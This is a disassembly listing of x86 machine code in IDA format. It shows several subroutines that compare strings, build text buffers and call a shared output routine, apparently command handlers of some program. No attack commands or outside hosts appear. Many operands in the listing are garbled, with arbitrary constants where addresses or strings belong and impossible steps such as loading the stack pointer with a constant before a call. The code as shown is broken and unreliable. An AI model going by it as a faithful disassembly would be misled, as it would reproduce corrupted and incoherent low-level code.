sub_4019F3 proc near ; DATA XREF: seg001:off_420AEC�o
push 4E608Dh
mov eax, 0C67304h
call sub_404635
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4C0h], eax
mov [ebp-4BCh], edi
jl loc_401BFF
mov eax, 0CEB398h
xor ebx, ebx
push esi
lea eax, [ebp-18Fh]
push ebx
push eax
mov [ebp-190h], bl
call sub_407B70
push esi
lea eax, [ebp-0CFh]
push ebx
push eax
mov [ebp-0D0h], bl
call sub_407B70
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41B7F9
push 6F59CCh
lea esi, [ebp-0D0h]
mov ebx, offset aNbEdGzDdnbgNdZ ; "¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ"...
call sub_4196D1
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401A8F
cmp ds:byte_425222, 0
jz loc_401C15
loc_401A8F: ; CODE XREF: sub_4019F3+8D�j
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401A9B: ; CODE XREF: sub_4019F3+C0�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401AB9
test dl, dl
jz short loc_401AB5
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401AB9
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401A9B
loc_401AB5: ; CODE XREF: sub_4019F3+B0�j
xor eax, eax
jmp short loc_401ABE
; ---------------------------------------------------------------------------
loc_401AB9: ; CODE XREF: sub_4019F3+AC�j
; sub_4019F3+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401ABE: ; CODE XREF: sub_4019F3+C4�j
test eax, eax
jnz loc_401BF2
push 77ACE6h
push eax
lea eax, [ebp-4B8h]
push eax
call sub_407B70
push dword ptr [ebp-4C0h]
mov edi, 0A1DEB3h
push esi
mov esi, 0AB1DEBh
lea eax, [ebp-4B8h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_401B02: ; CODE XREF: sub_4019F3+114�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B02
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h
push eax
call sub_402AEE
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_401B33: ; CODE XREF: sub_4019F3+145�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B33
mov ebx, [ebp-4BCh]
push dword ptr [ebx+8]
sub eax, ecx
push esi
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_401B66: ; CODE XREF: sub_4019F3+178�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B66
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-295h]
add esp, 10h
lea ecx, [eax+1]
loc_401B93: ; CODE XREF: sub_4019F3+1A5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B93
sub eax, ecx
mov [ebp+eax-295h], dl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 8
mov [ebp-193h], al
mov byte ptr [ebp-195h], 1
mov byte ptr [ebp-194h], 1
call sub_40304B
pop ecx
mov [ebp-4BCh], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_401C15
push 558EF5h
lea ecx, [ebp-4B8h]
mov edi, 0EEAC77h
mov esi, eax
call sub_4140AB
jmp short loc_401C15
; ---------------------------------------------------------------------------
loc_401BF2: ; CODE XREF: sub_4019F3+CD�j
push 77563Bh
push dword ptr [ebp-4C0h]
jmp short loc_401C05
; ---------------------------------------------------------------------------
loc_401BFF: ; CODE XREF: sub_4019F3+2E�j
push 7BAB1Dh
push eax
loc_401C05: ; CODE XREF: sub_4019F3+20A�j
push dword ptr [ebp+0Ch]
push 3DD58Eh
call sub_417361
add esp, 10h
loc_401C15: ; CODE XREF: sub_4019F3+96�j
; sub_4019F3+1E4�j ...
call sub_40467F
retn 1Ch
sub_4019F3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C1D proc near ; DATA XREF: seg001:off_420B04�o
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 118h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_10]
push ebx
mov [ebp+var_118], eax
push esi
push edi
xor eax, eax
xor ecx, ecx
mov [ebp+var_14], cl
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
push 5EEAC7h
stosb
push ecx
lea eax, [ebp+var_113]
push eax
mov [ebp+var_114], cl
call sub_407B70
push ds:dword_4269BC
lea esi, [ebp+var_14]
call sub_418FC6
push 6F7563h
lea esi, [ebp+var_114]
mov ebx, offset byte_425061
call sub_4196D1
mov eax, esi
push eax
push ds:dword_426594
lea eax, [ebp+var_14]
push eax
push 37BAB1h
push [ebp+var_118]
push [ebp+arg_4]
push 5BDD58h
call sub_417361
mov ecx, [ebp+var_4]
add esp, 30h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 1Ch
sub_401C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401CC0 proc near ; DATA XREF: seg001:off_420BC4�o
var_444 = byte ptr -444h
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = byte ptr -438h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_418 = byte ptr -418h
var_417 = byte ptr -417h
var_408 = byte ptr -408h
var_407 = byte ptr -407h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
var_208 = byte ptr -208h
var_207 = byte ptr -207h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 444h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+444h+var_4], eax
mov eax, [ebp+arg_10]
push ebx
push esi
push edi
mov edx, 0E56F75h
push esi
mov [esp+454h+var_43C], eax
xor ebx, ebx
lea eax, [esp+454h+var_107]
push ebx
push eax
mov [esp+45Ch+var_108], 0
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+454h+var_307]
push ebx
push eax
mov [esp+45Ch+var_308], bl
call sub_407B70
xor eax, eax
mov [esp+45Ch+var_418], bl
lea edi, [esp+45Ch+var_417]
stosd
stosd
stosd
stosw
add esp, 0Ch
push esi
stosb
lea eax, [esp+454h+var_407]
push ebx
push eax
mov [esp+45Ch+var_408], bl
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+454h+var_207]
push ebx
push eax
mov [esp+45Ch+var_208], bl
call sub_407B70
add esp, 0Ch
push 8
pop ecx
xor eax, eax
lea edi, [esp+450h+var_438]
rep stosd
lea eax, [esp+450h+var_438]
mov edi, 872B7Bh
push eax
mov [esp+454h+var_440], ebx
call ds:dword_4395BD
mov edi, [esp+450h+var_430]
mov ecx, [esp+450h+var_42C]
shr edi, 14h
shr ecx, 14h
mov eax, edi
sub eax, ecx
push 1
mov ecx, ebx
lea esi, [esp+454h+var_108]
mov dword ptr [esp+454h+var_444], eax
call sub_418E51
pop ecx
call sub_41A391
push 1
push ebx
lea esi, [esp+458h+var_308]
call sub_418E1F
push ds:dword_4269BC
lea esi, [esp+45Ch+var_418]
call sub_418FC6
add esp, 0Ch
lea eax, [esp+450h+var_440]
push eax
lea eax, [esp+454h+var_408]
push eax
call dword ptr ds:21CADEh
push ebx
lea eax, [esp+454h+var_208]
push eax
call dword ptr ds:50E56Fh
call sub_418DA0
push ds:dword_4265AC
lea eax, [esp+454h+var_208]
push ds:dword_4265A8
push ds:dword_4265A4
push ds:dword_4265A0
push ds:dword_42659C
push ds:dword_426598
push eax
lea eax, [esp+46Ch+var_408]
push eax
mov eax, esi
push eax
lea eax, [esp+474h+var_308]
push eax
push edi
push dword ptr [esp+47Ch+var_444]
mov ebx, 0E34395h
push ds:dword_426BE8
lea eax, [esp+484h+var_108]
push esi
push ds:dword_426BEC
push eax
push 79A1CAh
push [esp+494h+var_43C]
push [ebp+arg_4]
push 7CD0E5h
call sub_417361
push 3E6872h
push 0
push esi
call sub_407B70
mov ecx, [esp+4ACh+var_4]
add esp, 5Ch
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn 1Ch
sub_401CC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E82 proc near ; DATA XREF: seg001:off_420BCC�o
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_10]
push esi
push edi
push ds:dword_4269BC
mov [ebp+var_14], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
lea esi, [ebp+var_14]
stosb
call sub_418FC6
pop ecx
mov eax, esi
push eax
call dword ptr ds:5F3439h
push 2
mov [ebp+var_18], eax
push 4
lea eax, [ebp+var_18]
push eax
call dword ptr ds:2F9A1Ch
test eax, eax
jnz short loc_401EEF
mov eax, esi
push eax
push 57CD0Eh
push ebx
push [ebp+arg_4]
push 6BE687h
call sub_417361
add esp, 14h
jmp short loc_401F0B
; ---------------------------------------------------------------------------
loc_401EEF: ; CODE XREF: sub_401E82+50�j
push dword ptr [eax]
lea eax, [ebp+var_14]
push eax
push 35F343h
push ebx
push [ebp+arg_4]
push 5AF9A1h
call sub_417361
add esp, 18h
loc_401F0B: ; CODE XREF: sub_401E82+6B�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 1Ch
sub_401E82 endp
; =============== S U B R O U T I N E =======================================
sub_401F1C proc near ; DATA XREF: seg001:off_420D1C�o
push 60h
mov ebx, offset byte_42DAF9
call sub_404635
mov eax, [ebp+18h]
mov [ebp-68h], eax
xor eax, eax
mov byte ptr [ebp-30h], 0
lea edi, [ebp-2Fh]
stosd
stosd
stosd
mov ebx, [ebp+20h]
stosw
and dword ptr [ebp-58h], 0
and dword ptr [ebp-48h], 0
stosb
xor eax, eax
mov byte ptr [ebp-20h], 0
lea edi, [ebp-1Fh]
stosd
stosd
stosd
stosw
stosb
or edi, 0FFFFFFFFh
cmp ds:byte_433945, 0
mov [ebp-50h], ebx
mov byte ptr [ebp-41h], 0
mov [ebp-5Ch], edi
mov [ebp-60h], edi
mov [ebp-64h], edi
mov [ebp-6Ch], edi
jnz short loc_401F83
call sub_41B775
test al, al
jz loc_402432
loc_401F83: ; CODE XREF: sub_401F1C+58�j
cmp ds:byte_4268B4, 0
jnz short loc_401F99
call sub_418D17
test al, al
jz loc_402432
loc_401F99: ; CODE XREF: sub_401F1C+6E�j
and dword ptr [ebp-54h], 0
mov edi, 0C50B6Bh
mov eax, ecx
lea esi, [eax+1]
loc_401FA7: ; CODE XREF: sub_401F1C+90�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401FA7
jmp short loc_401FF6
; ---------------------------------------------------------------------------
loc_401FB0: ; CODE XREF: sub_401F1C+DC�j
mov edx, [ebx+4]
mov eax, ecx
loc_401FB5: ; CODE XREF: sub_401F1C+B1�j
mov cl, [eax]
cmp cl, [edx]
jnz short loc_401FD3
test cl, cl
jz short loc_401FCF
mov cl, [eax+1]
cmp cl, [edx+1]
jnz short loc_401FD3
inc eax
inc eax
inc edx
inc edx
test cl, cl
jnz short loc_401FB5
loc_401FCF: ; CODE XREF: sub_401F1C+A1�j
xor eax, eax
jmp short loc_401FD7
; ---------------------------------------------------------------------------
loc_401FD3: ; CODE XREF: sub_401F1C+9D�j
; sub_401F1C+A9�j
sbb eax, eax
sbb eax, edi
loc_401FD7: ; CODE XREF: sub_401F1C+B5�j
test eax, eax
jz short loc_401FFC
inc dword ptr [ebp-54h]
mov ecx, [ebp-54h]
imul ecx, 2Ch
lea ecx, dword_424528[ecx]
mov eax, ecx
lea esi, [eax+1]
loc_401FEF: ; CODE XREF: sub_401F1C+D8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401FEF
loc_401FF6: ; CODE XREF: sub_401F1C+92�j
sub eax, esi
jnz short loc_401FB0
jmp short loc_402001
; ---------------------------------------------------------------------------
loc_401FFC: ; CODE XREF: sub_401F1C+BD�j
cmp [ebp-54h], edi
jnz short loc_40201E
loc_402001: ; CODE XREF: sub_401F1C+DE�j
push 6285B5h
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push 7142DAh
call sub_417361
add esp, 10h
jmp loc_402432
; ---------------------------------------------------------------------------
loc_40201E: ; CODE XREF: sub_401F1C+E3�j
mov esi, [ebx+8]
mov eax, esi
mov ebx, 0EF142Dh
call sub_419044
test eax, eax
jz short loc_402043
push dword ptr [ebx+0Ch]
mov byte ptr [ebp-41h], 1
call sub_403ECE
pop ecx
mov [ebp-4Ch], eax
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_402043: ; CODE XREF: sub_401F1C+113�j
push esi
call sub_403ECE
pop ecx
push 3
pop edx
cmp [ebp+1Ch], edx
mov [ebp-4Ch], eax
mov [ebp-48h], edx
jl short loc_402099
mov eax, edx
loc_40205A: ; CODE XREF: sub_401F1C+17B�j
mov ecx, [ebp-50h]
mov eax, [ecx+eax*4]
mov edi, eax
mov edx, 7F8A1h
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_4020E7
mov edi, eax
mov ecx, 4F17F8h
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_402099
mov edi, eax
mov edi, 493C5Fh
mov ecx, edx
xor eax, eax
repe cmpsb
jz short loc_4020ED
inc dword ptr [ebp-48h]
movzx eax, word ptr [ebp-48h]
cmp eax, [ebp+1Ch]
jle short loc_40205A
loc_402099: ; CODE XREF: sub_401F1C+13A�j
; sub_401F1C+160�j
mov dword ptr [ebp-48h], 1
loc_4020A0: ; CODE XREF: sub_401F1C+125�j
; sub_401F1C+1CF�j ...
xor eax, eax
loc_4020A2: ; CODE XREF: sub_401F1C+19C�j
cmp ds:byte_426D01[eax], 0
jz short loc_4020AE
inc dword ptr [ebp-58h]
loc_4020AE: ; CODE XREF: sub_401F1C+18D�j
add eax, 124h
xor eax, 124F17h
jbe short loc_4020A2
mov ecx, [ebp-58h]
mov eax, 26493Ch
sub eax, ecx
cmp eax, [ebp-4Ch]
jnb short loc_4020F6
push eax
push 13249Eh
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push 49924Fh
call sub_417361
add esp, 14h
jmp loc_402432
; ---------------------------------------------------------------------------
loc_4020E7: ; CODE XREF: sub_401F1C+151�j
and dword ptr [ebp-48h], 0
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_4020ED: ; CODE XREF: sub_401F1C+16F�j
mov dword ptr [ebp-48h], 2
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_4020F6: ; CODE XREF: sub_401F1C+1AB�j
add [ebp-4Ch], ecx
cmp byte ptr [ebp-41h], 0
jz loc_40221D
mov eax, [ebp-50h]
push dword ptr [eax+8]
lea eax, [ebp-30h]
push 64C927h
push 0Fh
pop ebx
push ebx
push eax
call sub_402AEE
lea eax, [ebp-30h]
add esp, 10h
lea ecx, [eax+1]
loc_402124: ; CODE XREF: sub_401F1C+20D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402124
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push 326493h
push eax
call sub_4035E4
add esp, 18h
cmp dword ptr [ebp-5Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_40216C
push 193249h
push ebx
push eax
call sub_402AEE
add esp, 0Ch
jmp short loc_40217E
; ---------------------------------------------------------------------------
loc_40216C: ; CODE XREF: sub_401F1C+23D�j
push dword ptr [ebp-5Ch]
push 0C9924h
push ebx
push eax
call sub_402AEE
add esp, 10h
loc_40217E: ; CODE XREF: sub_401F1C+24E�j
cmp dword ptr [ebp-60h], 0FFFFFFFFh
mov edx, 6864C9h
mov esi, 89E193h
lea eax, [ebp-20h]
jnz short loc_40219F
push eax
push edi
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_4021B1
; ---------------------------------------------------------------------------
loc_40219F: ; CODE XREF: sub_401F1C+273�j
push dword ptr [ebp-60h]
push eax
push esi
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_4021B1: ; CODE XREF: sub_401F1C+281�j
cmp dword ptr [ebp-64h], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_4021C8
push eax
push edi
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_4021DA
; ---------------------------------------------------------------------------
loc_4021C8: ; CODE XREF: sub_401F1C+29C�j
push dword ptr [ebp-64h]
push eax
push esi
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_4021DA: ; CODE XREF: sub_401F1C+2AA�j
cmp dword ptr [ebp-6Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_4021F5
push eax
push 44F0C9h
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_40220B
; ---------------------------------------------------------------------------
loc_4021F5: ; CODE XREF: sub_401F1C+2C5�j
push dword ptr [ebp-6Ch]
push eax
push 627864h
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_40220B: ; CODE XREF: sub_401F1C+2D7�j
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_402211: ; CODE XREF: sub_401F1C+2FA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402211
jmp loc_4022F6
; ---------------------------------------------------------------------------
loc_40221D: ; CODE XREF: sub_401F1C+1E1�j
push ds:dword_4269BC
mov byte ptr [ebp-40h], 0
xor eax, eax
lea edi, [ebp-3Fh]
stosd
stosd
stosd
stosw
lea esi, [ebp-40h]
stosb
call sub_418FC6
xor eax, eax
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov eax, esi
push eax
push 713C32h
push 0Fh
pop esi
lea eax, [ebp-30h]
push esi
push eax
call sub_402AEE
lea eax, [ebp-30h]
add esp, 14h
lea ecx, [eax+1]
loc_402261: ; CODE XREF: sub_401F1C+34A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402261
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push 789E19h
push eax
call sub_4035E4
mov eax, [ebp-48h]
add esp, 18h
sub eax, 0
jz short loc_4022D4
dec eax
jz short loc_4022BA
dec eax
jnz short loc_4022E9
push dword ptr [ebp-64h]
lea eax, [ebp-20h]
push dword ptr [ebp-60h]
push dword ptr [ebp-5Ch]
push 3C4F0Ch
push esi
push eax
call sub_402AEE
add esp, 18h
jmp short loc_4022E9
; ---------------------------------------------------------------------------
loc_4022BA: ; CODE XREF: sub_401F1C+37C�j
push dword ptr [ebp-60h]
lea eax, [ebp-20h]
push dword ptr [ebp-5Ch]
push 5E2786h
push esi
push eax
call sub_402AEE
add esp, 14h
jmp short loc_4022E9
; ---------------------------------------------------------------------------
loc_4022D4: ; CODE XREF: sub_401F1C+379�j
push dword ptr [ebp-5Ch]
lea eax, [ebp-20h]
push 6F13C3h
push esi
push eax
call sub_402AEE
add esp, 10h
loc_4022E9: ; CODE XREF: sub_401F1C+37F�j
; sub_401F1C+39C�j ...
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_4022EF: ; CODE XREF: sub_401F1C+3D8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4022EF
loc_4022F6: ; CODE XREF: sub_401F1C+2FC�j
sub eax, edx
cmp byte ptr [ebp-41h], 0
mov byte ptr [ebp+eax-20h], 0
mov eax, [ebp-50h]
jz short loc_40230B
push dword ptr [eax+0Ch]
jmp short loc_40230E
; ---------------------------------------------------------------------------
loc_40230B: ; CODE XREF: sub_401F1C+3E8�j
push dword ptr [eax+8]
loc_40230E: ; CODE XREF: sub_401F1C+3ED�j
call sub_403ECE
push eax
mov eax, [ebp-54h]
imul eax, 2Ch
push ds:dword_424548[eax]
lea eax, [ebp-20h]
push eax
push 3789E1h
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push 1BC4F0h
call sub_417361
add esp, 20h
call sub_4192FB
mov ecx, [ebp-4Ch]
cmp [ebp-58h], ecx
jnb loc_402432
mov eax, [ebp-58h]
imul eax, 124h
sub ecx, [ebp-58h]
mov [ebp-50h], eax
mov [ebp-4Ch], ecx
mov esi, eax
loc_402361: ; CODE XREF: sub_401F1C+510�j
push 4DE278h
lea ebx, dword_426CF0[esi]
lea edi, [ebx-100h]
push 0
push edi
call sub_407B70
lea eax, [ebp-30h]
push eax
push 26F13Ch
push 0Fh
push ebx
call sub_402AEE
mov eax, ebx
add esp, 1Ch
lea ecx, [eax+1]
loc_402393: ; CODE XREF: sub_401F1C+47C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402393
push dword ptr [ebp-68h]
sub eax, ecx
mov byte ptr ds:dword_426CF0[esi+eax], dl
mov al, [ebp-41h]
push 13789Eh
mov [ebx+12h], al
mov eax, [ebp-48h]
push 9BC4Fh
push edi
mov [ebx+18h], eax
call sub_402AEE
mov eax, edi
add esp, 10h
lea ecx, [eax+1]
loc_4023CA: ; CODE XREF: sub_401F1C+4B3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4023CA
sub eax, ecx
mov ds:byte_426BF0[esi+eax], dl
mov al, [ebp+0Ch]
mov [ebx+10h], al
mov eax, [ebp-54h]
push 8
mov byte ptr [ebx+11h], 1
mov [ebx+14h], eax
call sub_40304B
pop ecx
mov [ebp-58h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_402415
mov ecx, edi
push 4DE27h
mov ecx, 81378h
mov esi, eax
call sub_4140AB
mov esi, [ebp-50h]
jmp short loc_402417
; ---------------------------------------------------------------------------
loc_402415: ; CODE XREF: sub_401F1C+4DF�j
xor eax, eax
loc_402417: ; CODE XREF: sub_401F1C+4F7�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [eax]
add esi, 124h
dec dword ptr [ebp-4Ch]
mov [ebx+20h], eax
mov [ebp-50h], esi
jnz loc_402361
loc_402432: ; CODE XREF: sub_401F1C+61�j
; sub_401F1C+77�j ...
call sub_40467F
retn 1Ch
sub_401F1C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40243A proc near ; DATA XREF: seg001:off_420D24�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
and [esp+1Ch+var_1C], 0
push ebx
push esi
mov ebx, 64604Dh
push edi
mov [esp+28h+var_10], ebx
loc_402453: ; CODE XREF: sub_40243A+83�j
; sub_40243A+A0�j ...
mov eax, ds:dword_433C4C
mov eax, [eax]
mov [esp+28h+var_14], eax
mov [esp+28h+var_18], ebx
loc_402462: ; CODE XREF: sub_40243A+67�j
mov eax, ds:dword_433C4C
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_4024F5
mov esp, 4BA302h
call sub_40164F
mov esi, eax
add esi, 5
push 8
pop ecx
xor eax, eax
repe cmpsb
lea esi, [esp+28h+var_18]
jz short loc_4024A3
lea edi, [esp+28h+var_8]
call sub_40168C
jmp short loc_402462
; ---------------------------------------------------------------------------
loc_4024A3: ; CODE XREF: sub_40243A+5C�j
call sub_40164F
mov edi, [eax+40h]
lea esi, [esp+28h+var_18]
call sub_40164F
mov eax, [eax]
call sub_414023
test al, al
jz short loc_402453
xor eax, eax
xor ecx, ecx
loc_4024C3: ; CODE XREF: sub_40243A+9E�j
cmp ds:dword_426D10[ecx], edi
jz short loc_4024DF
add ecx, 124h
inc eax
cmp ecx, 0CD50h
jbe short loc_4024C3
jmp loc_402453
; ---------------------------------------------------------------------------
loc_4024DF: ; CODE XREF: sub_40243A+8F�j
inc [esp+28h+var_1C]
imul eax, 124h
mov ds:byte_426D01[eax], 0
jmp loc_402453
; ---------------------------------------------------------------------------
loc_4024F5: ; CODE XREF: sub_40243A+40�j
push [esp+28h+var_1C]
push 2DD181h
push [ebp+arg_10]
push [ebp+arg_4]
push 16E8C0h
call sub_417361
add esp, 14h
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 1Ch
sub_40243A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=188h
sub_40251A proc near ; DATA XREF: seg001:off_420D2C�o
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-188h]
sub esp, 208h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+188h+var_4], eax
mov eax, [ebp+188h+arg_10]
push esi
push edi
mov eax, 698B74h
push esi
mov [ebp+188h+var_208], eax
lea eax, [ebp+188h+var_203]
push 0
push eax
mov [ebp+188h+var_204], 0
call sub_407B70
push 34C5BAh
lea eax, [ebp+188h+var_204]
push esi
push eax
xor edi, edi
call sub_402AEE
add esp, 18h
xor eax, eax
loc_40256B: ; CODE XREF: sub_40251A+7E�j
push ds:dword_42454C[eax]
lea eax, dword_424528[eax]
push eax
lea eax, [ebp+188h+var_204]
push eax
push 1A62DDh
push esi
push eax
call sub_402AEE
add esp, 18h
inc edi
mov eax, edi
imul eax, 2Ch
cmp ds:dword_424548[eax], 0
jnz short loc_40256B
lea eax, [ebp+188h+var_204]
push eax
push 0D316Eh
push esi
push eax
call sub_402AEE
push ds:dword_43394C
lea eax, [ebp+188h+var_204]
push eax
push 698B7h
push esi
push eax
call sub_402AEE
push ds:dword_433940
lea eax, [ebp+188h+var_204]
push eax
push 34C5Bh
push esi
push eax
call sub_402AEE
add esp, 38h
lea eax, [ebp+188h+var_204]
pop edi
lea edx, [eax+1]
pop esi
loc_4025E1: ; CODE XREF: sub_40251A+CC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4025E1
sub eax, edx
mov [ebp+eax+188h+var_204], cl
lea eax, [ebp+188h+var_204]
push eax
push 1A62Dh
push [ebp+188h+var_208]
push [ebp+188h+arg_4]
push 40D316h
call sub_417361
mov ecx, [ebp+188h+var_4]
xor ecx, ebp
add esp, 14h
call sub_402710
add ebp, 188h
leave
retn 1Ch
sub_40251A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402624 proc near ; CODE XREF: sub_41B1A0+A6�p
jmp dword ptr ds:20698Bh
sub_402624 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40262A proc near ; CODE XREF: sub_41B1A0+149�p
jmp dword ptr ds:1034C5h
sub_40262A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402630 proc near ; CODE XREF: sub_41B1A0+76�p
; sub_41B1A0+B9�p ...
jmp dword ptr ds:81A62h
sub_402630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402636 proc near ; CODE XREF: sub_41B1A0+C8�p
; sub_41B1A0+1C0�p ...
jmp ds:dword_440D31
sub_402636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40263C proc near ; CODE XREF: sub_41B1A0+1B1�p
jmp dword ptr ds:220698h
sub_40263C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402642 proc near ; CODE XREF: sub_41A9DE+B2�p
jmp dword ptr ds:11034Ch
sub_402642 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402648 proc near ; CODE XREF: sub_416F86+24�p
; sub_416F86+2F�p ...
jmp sub_40304B
sub_402648 endp
; =============== S U B R O U T I N E =======================================
sub_40264D proc near ; DATA XREF: seg001:004212A4�o
mov dword ptr [ecx], offset off_41D338
jmp sub_40109A
sub_40264D endp
; ---------------------------------------------------------------------------
loc_402658: ; DATA XREF: seg001:off_41D338�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D338
call sub_40109A
test byte ptr [esp+8], 1
jz short loc_402674
push esi
call sub_402F6D
pop ecx
loc_402674: ; CODE XREF: seg000:0040266B�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_40267A proc near ; CODE XREF: sub_401337+D�p
push 44h
mov esp, 0C4881Ah
call sub_4045CC
push 62440Dh
lea ecx, [ebp-28h]
call sub_401420
